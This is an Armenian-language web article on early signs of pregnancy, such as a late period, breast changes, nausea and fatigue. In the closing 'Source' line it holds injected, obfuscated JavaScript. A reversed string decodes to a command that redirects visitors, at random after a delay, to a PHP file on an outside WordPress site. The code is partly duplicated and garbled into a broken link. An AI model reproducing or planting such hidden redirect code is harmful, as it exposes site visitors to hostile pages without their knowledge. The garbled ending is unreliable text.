Վաղ նշաններ, որոնք կօգնեն առանց թեստի հաստատել հղիությունը

Յուրաքանչյուր կնոջ համար հղիությունը հուզիչ, բայցև սթրեսային շրջան է։ Ուստի, հղիության վաղ նշանների մասին բավարար տեղեկատվության առկայությունը շատ կարևոր է:

Ուշացած դաշտանային ցիկլ

Հղիության ամենատարածված նշանն, իհարկե, ուշացած դաշտանային ցիկլն է: Սակայն պետք է հաշվի առնել, որ դաշտանային ցիկլը կարող է ուշանալ նաև այլ պատճառներով, ինչպիսիք են քաշի կորուստը կամ ձեռքբերումը, հորմոնալ փոփոխությունները, հիվանդությունները և սթրեսը: Հետևաբար, միայն այս նշանով առաջնորդվելով՝ անհնար է միանշանակ հաստատել հղիությունը: Եթե ձեր դաշտանային ցիկլն ուշացել է մեկ շաբաթ կամ ավելին, ապա անհրաժեշտ է հղիության թեստ անել:

Կրծքերի ձևի և չափի փոփոխություններ

Բազմաթիվ կանանց համար կրծքերի փոփոխությունները հղիության ամենավաղ նշաններից են: Հղիության ընթացքում հորմոնների մակարդակն օրգանիզմում անդադար տատանվում է, ինչն էլ տարբեր ֆիզիկական փոփոխություններ է առաջացնում:

Հաճախակի այցեր լոգասենյակ

Եթե հղիության վաղ փուլում եք, ապա պատրաստ եղեք հաճախակի այցերին լոգասենյակ:

Սրտխառնոց

Շատ կանանց մոտ սրտխառնոցը հղիության առաջին շրջանի պարտադիր նշաններից է: Ընդ որում, ոմանց մոտ այն չի սահմանափակվում միայն առավոտյան ժամերով, այլ շարունակվում է ողջ օրվա ընթացքում:

Հոգնածության զգացում

Հղիության վաղ փուլում կնոջ օրգանիզմում բարձրանում է պրոգեստերոն հորմոնի մակարդակը, ինչն էլ անսովոր հոգնածության զգացում է առաջացնում: Միևնույն ժամանակ, արյան ճնշման տատանումները ևս նպաստում են հոգնածության առաջացմանը:

Աղբյուր՝ $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-conceive/signs-of-pregnancy/very-early-pregnancy-signs?fbclid=iwar1lcimzy8o0j3_8ptk0_c8icchwxnky000tm0hhouhobebtt8bexhda5wa” target=”_blank” rel=”noopener”>Flo